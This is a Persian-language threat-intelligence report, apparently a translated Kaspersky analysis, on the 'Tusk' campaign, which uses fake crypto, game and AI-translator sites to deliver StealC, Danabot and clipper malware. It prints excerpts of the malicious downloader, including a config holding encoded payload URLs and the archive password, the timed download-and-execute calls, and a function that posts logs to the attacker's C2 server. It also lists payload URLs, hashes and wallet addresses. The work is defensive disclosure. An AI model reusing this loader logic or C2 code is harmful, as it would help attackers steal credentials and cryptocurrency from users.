روابط عمومی شرکت ایدکو (توزیع‌کننده‌ی محصولات کسپرسکی در ایران)؛ تیم واکنش اضطراری جهانی کسپرسکی (GERT) کمپین پیچیده‌ای را شامل چند کمپین زیرمجموعه که از سوی مجران سایبری روسی‌زبان خط می‌گیرد شناسایی کرده است. کمپین‌های زیرمجموعه کارشان تقلید از پروژه‌های قانونی است و کمی دستکاری نام‌ها و برندها و استفاده از اکانت‌های رسانه‌های اجتاعی برای افزایش اعتبار آ‌ن‌ها. ما در تحلیل خود مشاهده کرده‌ایم که همه کمپین‌های زیرمجموعه میزبان دانلودهای اولیه‌ روی دراپ‌باکس هستند. این دانلودر وظیفه دارد نمونه‌های اضافی بدافزار را به دستگاه قربانی برساند که بیشتر هم سارق داده (Danabot و StealC) و کلیپر هستند. جدا از اینها، عاملین برای فریب کاربران در ارائه اطلاعات حساس اضافی مانند اطلاعات لاگین که بعدها می‌توانند در دارک‌وب فروخته شده یا برای دسترسی غیرقانونی به اکانت‌های گیمینگ و کیف‌پول‌های رمزارز و کش رفتن پول آن‌ها به طور مستقیم استفاده شوند از فیشینگ استفاده می‌کنند. ما سه کمپین زیرمجموعه فعال (در زمان تحلیل) و 16 کمپین زیرمجموعه غیرفعال مربوط به این فعالیت را شناسایی کردیم که نامش را «عاج» یا «Tusk» گذاشتیم زیرا عامل تهدید در پیام‌های لاگ دانلودرهای اولیه از «ماموت» (دست کم در سه کمپین زیرمجموعه فعال) استفاده می‌کرد. ماموت کلمه عامیانه عاملین تهدید روس‌زبان است برای اشاره به قربانی‌ها. ماموت‌ها در گذشته توسط باستانیان شکار می‌شدند و عاج‌شان جمع شده و به فروش می‌رفت. تحلیل کمپین‌های زیرمجموعه غیرفعال نشان می‌دهد اینها یا کمپین‌های قدیمی‌اند و یا کمپین‌هایی‌اند که هنوز شروع به کار نکرده‌اند. در این مقاله قصد داریم سه کمپین زیرمجموعه فعال اخیر را مورد بررسی قرار دهیم. با ما همراه باشید.

اولین کمپین زیرمجموعه (TidyMe)

در این کمپین، عامل پلت‌فرم peerme.io را که مخصوص ساخت و مدیریت DAOها (سازمان‌های خودکار غیرمتمرکز[1]) است روی بلاک‌چین MultiversX شبیه‌سازی می‌کند. هدفش قدرت‌دهی به جوامع کریپتو و پروژه‌ها با ارائه ابزارهایی است برای نظارت، تأمین مالی و همکاری در یک فریم‌ورک غیرمتمرکز. این وبسایت مخرب tidyme[.]io نام دارد. این وبسایت به جای دکمه «اکنون تیم خود را بسازید» در وب‌سایت قانونی حاوی دکمه «دانلود» است. با کلیک بر روی این دکمه درخواستی با User-Agent به عنوان آرگومان به وب سرور ارسال می‌شود. وب سرور از این داده‌ها برای تعیین نسخه‌ای از فایل مخرب برای ارسال به قربانی استفاده می‌کند. این کمپین دارای چندین نمونه بدافزار برای macOS و Windows است که هر دو در دراپ‌باکس میزبانی می‌شوند. در این مقاله ما فقط نمونه‌های ویندوزی را بررسی می‌کنیم.

علاوه بر توزیع بدافزار، این کمپین شامل قربانیانی می‌شود که کیف پول‌های ارزهای دیجیتال خود را مستقیماً از طریق وب‌سایت کمپین متصل می‌کنند. برای بررسی بیشتر، یک کیف پول آزمایشی با موجودی کوچک ایجاد کردیم و آن را به سایت لینک دادیم. با این حال، هیچ تراکنش برداشتی در طول این مطالعه آغاز نشد. هدف از این اقدام افشای آدرس کیف پول رمزارز عامل تهدید برای تجزیه و تحلیل بلاک چین بعدی بود. در طول تحقیقات ما، عوامل تهدید زیرساخت خود را به دامنه‌های tidymeapp[.]io و tidyme[.]app انتقال دادند. دامنه tidymeapp[.]io اکنون میزبان یک نسخه به روز شده از دانلود کننده اولیه است که تکنیک‌های ضد تجزیه و تحلیل اضافی را در خود جای داده. با همه این تغییرات، هدف اصلی آن یکسان است: دانلود و اجرای مراحل بعدی. تجزیه و تحلیل این نمونه های جدید هنوز در حال انجام است، با این وجود IoC های آنها در بخش IoCs در این گزارش گنجانده شده است. جزئیات تجزیه و تحلیل برای نمونه های قبلی از tidyme[.]io در زیر ارائه گشته.

دانلودر اولیه (TidyMe.exe)

این نمونه یک اپلیکیشن الکترون است. پس از اجرای آن، یک فرم CAPTCHA نمایش داده می‌شود و قربانی برای ادامه باید کد را وارد کند. تا زمانی که قربانی از بررسی CAPTCHA عبور نکند، هیچ فعالیت مخربی انجام نخواهد شد، که نشان می دهد عوامل تهدید آن را برای جلوگیری از اجرا با استفاده از ابزارهای تحلیل پویا خودکار (مانند جعبه‌های شنی) اضافه کرده‌اند. شایان ذکر است که کپچا درست برخلاف مدیریت توسط ی طرف‌سوم به طور درونی در کپچا فایل جاوااسکریپت مدیریت می‌شود و این نشان‌ می‌دهد مهاجمین قصد داشتند مطمئن شوند قربانی نمونه را اجرا کرده. بعد از اینکه کاربر چک کپچا را رد کرد، نمونه روی رابط اپ اصلی لانچ می‌شود که خود شبیه به صفحه پروفایل است. اما حتی اگر کاربر اینجا هم یک سری اطلاعات وارد کند هیچ چیزی اتفاق نخواهد افتاد. در عین حال نمونه شروع می‌کند به دانلود دو فایل اضافی مخرب در پس‌زمینه که سپس اجرا می‌شوند.

روتین دانلودر

نمونه tidyme.exe یک فایل پیکربندی به نام config.json دارد حاوی URLهای کدگذاری شده با base64 و رمز عبور برای رفع فشرده‌سازی داده های آرشیو شده که برای دانلود بارهای مرحله دوم استفاده می‌شود. محتوای فایل از این قرار است:

{

 "archive": "aHR0cHM6Ly93d3cuZHJvcGJveC5jb20vc2NsL2ZpL2N3NmpzYnA5ODF4eTg4dHprM29ibS91cGRhdGVsb2FkLnJhcj9ybGtleT04N2c5NjllbTU5OXZub3NsY2dseW85N2ZhJnN0PTFwN2RvcHNsJmRsPTE=",

 "password": "newfile2024",

 "bytes": "aHR0cDovL3Rlc3Rsb2FkLnB5dGhvbmFueXdoZXJlLmNvbS9nZXRieXRlcy9m"

}

این هم فهرست یوآرال‌های رمزگشایی‌شده:

نام فایل: آرشیو

ارزش رمزگشایی‌شده: hxxps[:]//www.dropbox[.]com/scl/fi/cw6jsbp981xy88tzk3obm/updateload.rar?rlkey=87g969em599vnoslcglyo97fa&st=1p7dopsl&dl=1

نام فایل: بایتز

ارزش رمزگشایی‌شده: hxxp[:]//testload.pythonanywhere[.]com/getbytes/f

عملکرد اصلی دانلودر در فایل preload.js در دو تابع downloadAndExtractArchive و loadFile ذخیره می‌شود. تابع downloadAndExtractArchive آرشیو فیلد را از فایل پیکربندی که یک لینک Dropbox رمزگذاری شده است بازیابی نموده آن را رمزگشایی‌ و فایل را از Dropbox به مسیر %TEMP%/archive-<RANDOM_STRING> ذخیره می‌کند. فایل دانلودشده یک فایل RAR محافظت‌شده با رمز عبور است که با مقدار رمز فیلد در فایل پیکربندی استخراج سپس تمامی فایل های exe از این آرشیو اجرا می‌شوند. تابع loadFile بایت های فیلد را از فایل پیکربندی بازیابی آن را با استفاده از base64 رمزگشایی و یک درخواست GET را به URL حاصل ارسال می‌کند. پاسخ حاوی یک آرایه بایت است که به بایت تبدیل و در مسیر %TEMP%/<MD5_HASH_OF_CURRENT_TIME>.exe نوشته می‌شود. پس از دانلود موفقیت آمیز، این تابع فایل را رمزگشایی 750000000 بایت به انتهای آن اضافه می‌کند و سپس آن را اجرا می‌نماید. این دو تابع، علاوه بر توابع دیگر، صادر می شوند، که به فرآیندهای رندر اجازه می‌دهد تا پس از گذراندن بررسی CAPTCHA توسط کاربر، آنها را با کمی تاخیر در فایلی به نام script.js فراخوانی کنند. در اینجا کد مسئول فراخوانی این توابع است:

1 2 3 4 5 6 7 8

setTimeout(() => {  window.api.downloadAndExtractArchive() }, 10000)   setTimeout(() => {  window.api.loadFile() }, 100000) ...

علاوه بر دو تابع بالا، نمونه حاوی تابعی به نام sendRequest است. این تابع مسئول ارسال پیام‌های گزارش به سرور C2 عامل تهدید با استفاده از پیام های HTTP POST به URL hxxps[:]//tidyme[.]io/api.php است. در زیر کد تابع آمده است:

is the function’s code:

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15

async function sendRequest(data) {  const formData = new URLSearchParams();  Object.entries(data).forEach(([key, value]) => {   formData.append(key, value);  });    const response = await fetch('https://tidyme.io/api.php', {   method: 'POST',   headers: {    'Content-Type': 'application/x-www-form-urlencoded',   },   body: formData,  });  return response.json(); }

در اینجا نمونه ای از داده‌هایی است که به عنوان آرگومان به تابع sendRequest ارسال شده است:

1 2 3 4 5 6 7 8 9

const { v4: uuidv4 } = require('uuid'); const randomUUID = uuidv4();   let data = { key: "aac1ff44", type: "customlog", code: randomUUID, message: "Нет действия..." };

پیام‌های ارسال شده به سرور C2 به زبان روسی است. جدول زیر پیام‌ها را به همراه ترجمه انگلیسی (که ما برایتان فارسی کرده‌ایم) نشان می‌دهد:

پیام اصلی و ترجمه فارسی

Ошибка при создании буфера из архивных данных:

خطا موقع ساخت بافری از داده آرشیوی

Нет действия…

هیچ اقدامی صورت نگرفت

Создаю директорию.

دارم دایرکتوری می‌سازم

Получил файл.

فایل را گرفتم

Записал файл в директорию

فایل را در دایرکتوری نوشتم

Unboxing подъехал.

آنباکسینگ رسید

Открыл файл.

فایل باز شد

Не смог открыть файл. Error:

نتوانستم فایل را باز کنم. خطا داد

Глобальная ошибка:

خطای جهانی

Нет действия…

هیچ اقدامی صورت نگرفت

Выполняю повторный стук.

دوباره می‌آیم

Не удалось получить файл с сайта! Перезапускаюсь.

نتوانستم از سایت، فایل بگیرم. دارم ریستارت می‌کنم

Файл успешно записан на устройство

فایل، با موفقیت در دستگاه نوشته شد

Раздуваю файл.

دارم سایز فایل را بیشتر می‌کنم

Открыл файл.

فایل باز شد

Неудачное открытие файла, через 4 минуты повторяю…

باز کردن فایل ناموفق بود. بعد از 4 دقیقه تکرار شود

Глобальная ошибка:

خطای جهانی

Мамонт открыл лаунчер…

ماموت لانچر را باز کرد

Мамонт свернул лаунчер…

ماموت لانچر را فرو ریخت

Мамонт закрыл лаунчер…

ماموت لانچر را بست

در این کمپین، هر دو updateload.exe و bytes.exe یک فایل با هش‌های زیر هستند:

 

MD5: B42F971AC5AAA48CC2DA13B55436C277

SHA1: 5BF729C6A67603E8340F31BAC2083F2A4359C24B

SHA256: C990A578A32D545645B51C2D527D7A189A7E09FF7DC02CEFC079225900F296AC

پی‌لود (updateload.exe و bytes.exe)

این نمونه از HijackLoader، یک لودر مدولار با قابلیت‌های مختلف مانند بای پس UAC، تکنیک‌های مختلف تزریق فرآیند، و فرار از قلاب API درون خطی استفاده می‌کند. پس از حذف و اجرای updateload.exe  یا bytes.exe، یک سری از تزریق‌های فرآیندی را شروع می‌کند که با تزریق shellcode به cmd.exe آغاز می‌شود، سپس خود را حذف می‌کند، پس از آن کد مخرب تزریق شده به cmd.exe، یک پوسته کد دیگر را به پروسه explorer.exe تزریق می‌کند. هر دو کد پوسته نسخه 32 بیتی هستند. در نتیجه زنجیره تزریق، مرحله نهایی در چارچوب فرآیند explorer.exe اجرا می‌شود که نوعی از خانواده بدافزار infostealer StealC است. بار نهایی شروع به برقراری ارتباط با سرور C2 عامل تهدید و DLL های قانونی اضافی را دانلود می کند تا در هنگام جمع آوری و ارسال اطلاعات مربوط به سیستم آلوده استفاده شود، از جمله موارد زیر:

HWID (شناسه منحصر به فرد برای سیستم آلوده که توسط بدافزار از شماره سریال درایو C محاسبه می شود)؛

شماره ساخت (meowsterioland4)

اطلاعات شبکه

IP

کشور

خلاصه سیستم

شناسه سخت افزار از سیستم عامل؛

سیستم عامل

معماری

نام کاربری

به وقت محلی

برنامه‌های نصب شده

همه کاربران

کاربر فعلی

لیست فرآیند

• اسکرین‌شات

سپس شروع به درخواست تنظیمات از سرور C2، که یک IP عمومی است، برای جمع آوری داده ها می‌کند. جدول زیر پیکربندی‌ها را به همراه توضیحات آنها فهرست می‌کند:

نام پیکربندی	شرح
مرورگرها	داده‌هایی که قرار است از مرورگرها جمع شود
پلاگین	داده‌هایی که قرار است از افزونه‌های مرورگر جمع شود
اف‌پلاگین	N/A
والت‌ها	داده‌هایی که قرار است برای اپ‌های دسکتاپی والت جمع شود

شناسایی کمپین‌های زیرمجموعه اضافی

پس از تکمیل تجزیه و تحلیل خود از اولین کمپین فرعی، فعالیت‌های اطلاعاتی درباره تهدید سایبری (CTI) و OSINT را با هدف جمع‌آوری هرچه بیشتر اطلاعات مربوط به عامل تهدید و این کمپین خاص انجام دادیم. با نگاهی به رکوردهای DNS برای اولین کمپین TidyMe))، رکوردهای MX را با مقدار _dc-mx.bf442731a463[.]tidyme[.]io شناسایی کردیم. با حل این دامنه به یک رکورد A، IP 79.133.180[.]213 برمی‌گردد. با استفاده از پرتال اطلاعاتی تهدیدات کسپرسکی TIP))، ما توانستیم تمام دامنه‌های تاریخی و فعلی مرتبط با این IP را شناسایی کنیم. از دامنه‌های مذکور، تنها سه مورد اول در طول تجزیه و تحلیل ما فعال بودند. ما قبلاً tidyme[.]io را بررسی کرده‌ایم، بنابراین در ادامه درباره دو کمپین فرعی فعال دیگر بحث خواهیم کرد.

علاوه بر لینک بین دامنه‌ها و IP، هر سه کمپین فعال از پروژه های قانونی تقلید می‌کنند و حاوی یک لینک دانلود به یک بدافزار دانلود کننده اولیه هستند.

دومین کمپین زیرمجموعه (RuneOnlineWorld)

در این کمپین، بازیگر تهدید در حال شبیه‌سازی وبسایت یک بازی MMO بود. دامنه اصلی وبسایت riseonlineworld.com است، در حالی که وبسایت مخرب runeonlineworld[.]io است. این وبسایت مخرب حاوی یک لینک دانلود برای دانلودکننده اولیه است که از لانچر بازی تقلید می‌کند. دانلودر در Dropbox میزبانی می‌شود و از همان منطقی که در بخش TidyMe  (اولین زیرمجموعه) توضیح داده شده است پیروی می‌کند تا دانلودر مناسب برای سیستم عامل قربانی را به دست آورد. نام نمونه RuneOnlineWorld.exe است.

دانلودر اولیه (RuneOnlineWorld.exe)

این نمونه نیز یک اپلیکیشن Electron با ساختار و منطقی مشابه با دانلود کننده اولیه در کمپین فرعی اول است. URL های مختلفی در فایل پیکربندی وجود دارد، اما در غیر این صورت، بیشتر تغییرات شامل رابط اصلی برنامه می‌شود: به جای صفحه نمایه، شبیه یک صفحه ورود به سیستم است. علاوه بر این، صفحه ورود به سیستم در واقع داده‌های وارد شده را پردازش می‌کند. ابتدا رمز عبور از نظر پیچیدگی بررسی می‌شود. در صورت پاس شدن چک، نام کاربری و رمز عبور به C2 ارسال می‌شود. سپس یک صفحه در حال بارگذاری نمایش داده شده که در اصل یک مدل برای دادن زمان کافی به وظایف پس زمینه برای دانلود فایل‌های مخرب اضافی است.

اولین پی‌لود (updateload.exe)

در کمپین RuneOnlineWorld، این دو بار دیگر فایل نیستند. Updateload.exe از HijackLoader استفاده و کد را به چندین برنامه قانونی تزریق می‌کند تا از شناسایی جلوگیری شود. با تزریق کد به cmd.exe و سپس explorer.exe شروع می‌شود. پس از آن، کد مخرب تزریق شده به explorer.exe شروع به برقراری ارتباط با چندین سرور C2 می‌کند تا فایل‌های مخرب DLL و MSI اضافی را دانلود و در مسیر C:\Users\<USERNAME>\Appdata\ ذخیره کند. پس از دانلود فایل‌های مخرب، explorer.exe فایل‌های MSI را با استفاده از msiexec.exe و فایل‌های DLL را با استفاده از rundll32.exe اجرا می‌کند. مرحله نهایی برای این نمونه، چندین infostealer از خانواده بدافزار Danabot و StealC است (تزریق شده به explorer.exe).

دومین پی‌لود (bytes.exe)

این نمونه همچنین از HijackLoader برای فرار از تشخیص استفاده می‌کند، مراحل مختلف بار را باز و آنها را به فرآیندهای قانونی تزریق می‌کند. ابتدا کدهای مخرب را به cmd.exe می‌سازد و تزریق می‌کند، که کد را به explorer.exe و سپس به OpenWith.exe -یک فرآیند قانونی ویندوز- تزریق نماید. کد مخرب تزریق شده به OpenWith.exe مرحله بعدی را از C2 عامل تهدید (یک IP عمومی دیگر) دانلود می‌کند، آن را رمزگشایی و به نمونه OpenWith.exe دیگری تزریق می‌کند. در این مرحله، payload شش فایل را در دایرکتوری %APPDATA%\AD_Security\ دانلود می‌کند و یک کار زمان‌بندی شده به نام FJ_load ایجاد می‌نماید که فایلی به نام madHcCtrl.exe را در هنگام ورود برای ماندگاری اجرا شود. همه این فایل‌های DLL و EXE قانونی هستند، به جز madHcNet32.dll.  فایل‌های مخرب wickerwork.indd و bufotenine.yml حاوی داده‌های رمزگذاری شده هستند.

madHcNet32.dll

madHcCtrl.exe madHcNet32.dll را بارگیری و اجرا می‌کند، که به نوبه خود از HijackLoader برای استخراج و اجرای بار نهایی استفاده می‌نماید. پس از اجرا، madHcCtrl.exe مرحله بعدی را به cmd.exe تزریق سپس مرحله نهایی به explorer.exe تزریق می‌شود. محموله نهایی بدافزار کلیپر است که در GO نوشته شده. این نمونه بر اساس بدافزار کلیپر منبع باز است.

کلیپر داده‌های کلیپ بورد را نظارت می‌کند. اگر آدرس کیف پول ارز دیجیتال در کلیپ بورد کپی شود، آن را با آدرس زیر جایگزین می‌کند:

• BTC: 1DSWHiAW1iSFYVb86WQQUPn57iQ6W1DjGo

علاوه بر این، نمونه شامل رشته‌های منحصر به فردی مانند موارد زیر می‌شود:

C:/Users/Helheim/

C:/Users/Helheim/Desktop/clipper no autorun/mainTIMER.go

هنگام جستجوی نمونه‌هایی که دارای رشته‌های یکسانی هستند، نمونه‌های دیگری را با آدرس‌های کیف پول متفاوت شناسایی کردیم:

 

ETH: 0xaf0362e215Ff4e004F30e785e822F7E20b99723A

BTC: bc1qqkvgqtpwq6g59xgwr2sccvmudejfxwyl8g9xg0

ما برخی از تراکنش‌ها را در آدرس کیف پول دوم و سوم شناسایی کردیم. در زمان نوشتن این پست هیچ تراکنشی مربوط به اولین آدرس کیف پول وجود نداشت. کیف پول دوم از 4 مارس تا 31 جولای فعال بود و در مجموع 9.137 ETH دریافت کرد. سومین مورد بین 2 آوریل و 6 آگوست با دریافت 0.0209 بیت کوین در مجموع فعال بود. توجه داشته باشید که این آدرس‌ها فقط در بدافزار کلیپر مشاهده شده است. این کمپین همچنین از دزدهای اطلاعاتی برای سرقت کیف پول‌های رمزنگاری مبتنی بر نرم‌افزار استفاده می‌کند که می‌تواند برای دسترسی به وجوه قربانی استفاده شود، هرچند چنین فعالیتی را ندیده‌ایم. علاوه بر این، دزدان اطلاعاتی داده‌هایی را از مرورگرها و منابع دیگر جمع‌آوری می‌کنند که به عامل تهدید اجازه می‌دهد به خدمات دیگری که قربانی استفاده می‌کند (مانند سیستم‌های بانکی آنلاین) دسترسی پیدا کند یا داده‌های دزدیده شده را در دارک‌وب بفروشد.

سومین کمپین زیرمجموعه (Voico)

در این کمپین، بازیگر تهدید یک پروژه مترجم هوش مصنوعی به نام YOUS را شبیه سازی می‌کرد. وبسایت اصلی yous.ai است، در حالیکه وبسایت مخرب voico[.]io است. درست مانند دو کمپین فرعی قبلی، وب‌سایت مخرب حاوی یک لینک دانلود برای دانلود کننده اولیه با تقلید از برنامه است. دانلود کننده در Dropbox میزبانی شده و از همان منطقی که در اولین کمپین فرعی برای دانلود دانلودکننده مناسب برای سیستم عامل قربانی توضیح داده شده است پیروی می‌کند. در طول بررسی ما، وبسایت مخرب این کمپین وجود نداشت. نام نمونه Voico.exe است.

دانلودر اولیه (Voico.exe)

این نمونه نیز یک اپلیکیشن Electron است که عمدتاً ساختاری مشابه دانلود کننده‌های اولیه در دو کمپین فرعی قبلی دارد. منطق دانلودر نیز ثابت می‌ماند. بیشتر تغییرات شامل رابط اصلی برنامه می‌شود و URL های مختلفی در فایل پیکربندی موجود است. علاوه بر این تغییرات، نمونه از قربانی می‌خواهد که یک فرم ثبت نام را که داده ها را به C2 ارسال نمی‌کند پر کند. درعوض، اعتبار کاربر را به تابع console.log()  می‌فرستد. هر دو نمونه در این کمپین (updateload.exe و bytes.exe)رفتار بسیار مشابهی با نمونه updateload.exe از کمپین فرعی دوم دارند.

پی‌لود (updateload.exe and bytes.exe)

این نمونه‌ها رفتاری مشابه نمونه updateload.exe از کمپین فرعی دوم دارند با یک تفاوت: بدافزار StealC دانلود شده توسط آنها به سرور C2 دیگری ارتباط برقرار می‌کند. به غیر از آن، کل روال از اجرای updateload.exe و bytes.exe تا اجرای payload نهایی یکسان است.

سایر کمپین‌های احتمالی زیرمجموعه

در طول تجزیه و تحلیل این کمپین، نمونه‌های تجزیه و تحلیل شده در مسیرهای زیر در وبسایت مهاجم میزبانی شدند: http[:]//testload.pythonanywhere.com/getbytes/f و http[:]//testload.pythonanywhere.com/getbytes /m. ما هیچ منبع دیگری را که در کمپین‌های فرعی فعلی استفاده شده است، پیدا نکردیم (این بدان معنا نیست که در آینده ظاهر نخواهند شد). با این حال، متوجه نمونه‌های دیگری شدیم که در مسیرهای مختلف میزبانی می‌شوند- بدون ارتباط با کمپین‌های فرعی در حال انجام. در زیر لیستی از مسیرها در وب سایت PythonAnywhere که این نمونه‌ها در آن میزبانی می‌شوند آمده است:

http[:]//testload.pythonanywhere.com/getbytes/s

http[:]//testload.pythonanywhere.com/getbytes/h

هش فایل‌ها در مسیرهای جدید قبلاً در فهرست IoCهای زیر گنجانده شده‌اند.

جمع‌بندی

کمپین افشاشده در این گزارش تهدید مداوم و در حال تکاملی را نشان می‌دهد که توسط مجرمان سایبری که در تقلید از پروژه های قانونی برای فریب قربانیان مهارت دارند، ایجاد می‌شود. این مهاجمین با بهره‌برداری از اعتماد کاربران در پلت‌فرم‌های شناخته‌شده، به طور موثر طیفی از بدافزارها را که برای سرقت اطلاعات حساس، به خطر انداختن سیستم‌ها و در نهایت دستیابی به سود مالی طراحی شده‌اند، مستقر می‌کنند. تکیه بر تکنیک‌های مهندسی اجتماعی مانند فیشینگ، همراه با مکانیسم‌های ارسال بدافزار چند مرحله‌ای، قابلیت‌های پیشرفته بازیگران تهدید درگیر را برجسته می‌کند. استفاده آن‌ها از پلت‌فرم‌هایی مانند Dropbox برای میزبانی از دانلودکنندگان اولیه، در کنار استقرار بدافزارهای infostealer و clipper، به تلاشی هماهنگ برای فرار از شناسایی و به حداکثر رساندن تأثیر عملیات آنها اشاره دارد.

وجوه مشترک بین کمپین‌های فرعی مختلف و زیرساخت‌های مشترک بین آنها، نشان‌دهنده یک عملیات سازمان‌یافته است که به طور بالقوه به یک بازیگر یا گروه با انگیزه‌های مالی خاص مرتبط می‌شود. تجزیه و تحلیل دقیق ما از سه کمپین فرعی فعال، از روتین‌های دانلود کننده اولیه تا بارهای نهایی، زنجیره پیچیده ای از حملات را نشان می‌دهد که برای نفوذ به محیط‌های Windows و macOS طراحی شده‌اند. علاوه بر کمپین‌های فرعی فعال، کشف 16 کمپین فرعی غیرفعال، ماهیت پویا و سازگار عملیات عامل تهدید را برجسته می‌کند.

این کمپین‌های فرعی غیرفعال، که ممکن است نشان‌دهنده کمپین‌های قدیمی‌تری باشند که بازنشسته شده‌اند یا کمپین‌های جدیدی که هنوز راه‌اندازی نشده‌اند، توانایی عامل تهدید را برای ایجاد و استقرار سریع عملیات‌های مخرب جدید، با هدف قرار دادن موضوعات پرطرفدار در زمان کمپین نشان می‌دهند. این چرخش سریع، دشمنی با منابع و چابک را نشان می‌دهد که می‌تواند به سرعت تاکتیک‌ها و زیرساخت‌ها را برای جلوگیری از شناسایی و حفظ اثربخشی کمپین‌های خود تغییر دهد. حضور این کمپین‌های غیرفعال نشان از آن دارد که عامل تهدید احتمالاً به توسعه استراتژی‌های خود ادامه می‌دهد و به طور بالقوه این کمپین‌های فرعی را دوباره فعال یا در آینده نزدیک کمپین‌های کاملاً جدیدی را راه‌اندازی می‌کند. این نیاز به نظارت مستمر و راهبردهای دفاعی پیشگیرانه را برای جلوتر از این تهدیدهای در حال تحول تقویت می‌کند. چنانچه شرکت شما رخداد امنیت سایبری‌ای را تجربه کرده که نیاز به پاسخ فوری دارد، با سرویس Kaspersky Incident Response تماس بگیرید.

 

[1] decentralized autonomous organizations

کسپرسکی آنلاین (ایدکو)

کسپرسکی اسم یکی از بزرگترین شرکتهای امنیتی و سازنده آنتی ویروس است که برخی از کاربران اشتباهاً این شرکت و محصولات آنتی ویروس آن را با عناوینی نظیر کسپرسکای،کاسپرسکی، کسپراسکای، کسپراسکای، و یا کاسپراسکای نیز می‌شناسد. همچنین لازم به ذکر است مدیرعامل این شرکت نیز یوجین کسپرسکی نام دارد.